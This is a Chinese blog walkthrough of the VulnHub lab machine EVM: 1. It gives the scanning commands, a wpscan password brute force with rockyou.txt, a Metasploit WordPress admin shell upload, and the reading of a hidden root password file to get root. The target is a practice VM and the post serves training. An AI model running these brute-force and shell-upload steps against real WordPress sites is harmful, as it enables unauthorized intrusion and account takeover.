通关vulnhub靶机(六)

admin 2022年2月28日16:15:09评论154 views字数 1059阅读3分31秒阅读模式

通关vulnhub靶机(六)

这次的靶机是EVM:1,其实就是对wordpress网站的简单渗透


0x00: 靶机下载


下载链接: https://www.vulnhub.com/entry/evm-1,391/

看了一下描述友好级别也是建议用VirtualBox比较好

通关vulnhub靶机(六)


下载完以后我用VirutalBox打开,建议kali和EVM1都设置成桥接网卡比较容易获取到IP


通关vulnhub靶机(六)


0x01: 探测靶机

先用netdiscover探测一波,排除.1,默认网关以及一些我的手机设备可以确定靶机IP为192.168.3.184

命令:netdiscover-r 192.168.3.0/16


通关vulnhub靶机(六)


开始用nmap探测端口,主要开了22,53,80,110,139,143以及445端口

命令:nmap-A -sS -sV -v -p- 192.168.3.184


通关vulnhub靶机(六)


0x02: 挖掘漏洞

先正常输入一下IP地址,能正常回显而且地下有一行 you can find me at /wordpress/ in vulnerable webapp  已经暗示了这是一个wordpress的站


通关vulnhub靶机(六)


这里有点奇怪的是192.168.3.184/wordpress这个页面即使更改了hosts文件也是加载的十分缓慢。。。。可能是我更改错了


不过没什么影响先用wpscan扫一波,扫到一个用户c0rrupt3d_brain

命令:wpscan–url http://192.168.3.184 -e u


通关vulnhub靶机(六)

继续,由于浏览不到主页使用爆破技术,爆出一个用户名和密码出来

命令:wpscan --url http://192.168.3.184/wordpress -U c0rrupt3d_brain -P/usr/share/wordlists/rockyou.txt


通关vulnhub靶机(六)

0x03: 利用MSF上传shell

由于我们知道了账号密码所以可以用MSF自带的模块上传shell

命令:useexploit/unix/webapp/wp_admin_shell_upload

Set RHOST 192.168.3.184

Set PASSWORD xxxxx

Set USERNAME xxxxx

Set TARGETURI /wordpress

run


通关vulnhub靶机(六)


成功,顺利进入shell模式


通关vulnhub靶机(六)


0x04:挖掘信息

来到/home/root3r目录下发现一个test.txt然而没啥东西,为了防止漏掉东西直接ls-la查到一个.root_password_ssh.txt的东西

通关vulnhub靶机(六)


Cat 以后得到一串字符应该是密码,直接切换root用户成功登录读到flag


通关vulnhub靶机(六)

通关vulnhub靶机(六)

本文始发于微信公众号(疯猫网络):通关vulnhub靶机(六)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月28日16:15:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通关vulnhub靶机(六)http://cn-sec.com/archives/504554.html

发表评论

匿名网友 填写信息